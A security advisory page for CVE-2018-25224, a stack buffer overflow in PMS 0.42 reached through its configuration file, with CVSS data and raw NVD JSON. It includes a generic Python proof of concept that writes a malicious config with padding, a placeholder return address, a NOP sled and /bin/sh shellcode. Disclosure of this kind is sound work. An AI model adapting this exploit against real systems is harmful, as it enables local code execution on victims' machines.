Security Vulnerability Report
CVE-2018-25224 CVSS 8.4 HIGH

CVE-2018-25224

Published: 2026-03-28 12:16:03
Last Modified: 2026-04-02 19:07:35

Description

PMS 0.42 contains a stack-based buffer overflow vulnerability that allows local unauthenticated attackers to execute arbitrary code by supplying malicious values in the configuration file. Attackers can craft configuration files with oversized input that overflows the stack buffer and execute shell commands via return-oriented programming gadgets.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:kimtore:practical_music_search:*:*:*:*:*:*:*:* - VULNERABLE
PMS 0.42

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

# PoC for CVE-2018-25224: PMS Stack-Based Buffer Overflow
# This script generates a malicious configuration file to trigger the overflow.

# Configuration: Adjust buffer offset based on target environment debugging
BUFFER_SIZE = 256  # Example buffer size
OFFSET = 260  # Offset to overwrite the return address

# ROP Chain or Shellcode placeholder
# In a real scenario, this would point to ROP gadgets to bypass DEP/NX
# Example: Address of system() or a jmp esp gadget
RET_ADDR = struct.pack("<I", 0xdeadbeef)

# Payload construction
# 1. Padding to reach the return address on the stack
padding = b"A" * OFFSET

# 2. Overwrite EIP/RIP with return address
eip_overwrite = RET_ADDR

# 3. NOP sled followed by shellcode (if executable stack is present)
nop_sled = b"\x90" * 32
# Example shellcode (exec /bin/sh on Linux x86)
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

payload = padding + eip_overwrite + nop_sled + shellcode

# Generate malicious configuration file
# Assuming the vulnerable parameter is read into the stack buffer
config_content = b"vulnerable_parameter = " + payload + b"\n"

try:
    with open("pms_malicious.conf", "wb") as f:
        f.write(config_content)
    print("[+] Malicious configuration file 'pms_malicious.conf' created successfully.")
    print("[*] Replace the legitimate config file with this file and restart PMS to exploit.")
except IOError as e:
    print(f"[-] Error creating file: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25224", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:03.370", "lastModified": "2026-04-02T19:07:35.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PMS 0.42 contains a stack-based buffer overflow vulnerability that allows local unauthenticated attackers to execute arbitrary code by supplying malicious values in the configuration file. Attackers can craft configuration files with oversized input that overflows the stack buffer and execute shell commands via return-oriented programming gadgets."}, {"lang": "es", "value": "PMS 0.42 contiene una vulnerabilidad de desbordamiento de búfer basado en pila que permite a atacantes locales no autenticados ejecutar código arbitrario al proporcionar valores maliciosos en el archivo de configuración. Los atacantes pueden crear archivos de configuración con entradas de tamaño excesivo que desbordan el búfer de pila y ejecutar comandos de shell a través de gadgets de programación orientada a retorno."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", 
"modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kimtore:practical_music_search:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.42", "matchCriteriaId": "89922C89-7254-407D-83EF-0F427C9ADA54"}]}]}], "references": [{"url": 
"https://pms.sourceforge.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/44426", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/pms-stack-based-buffer-overflow-via-configuration-file", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}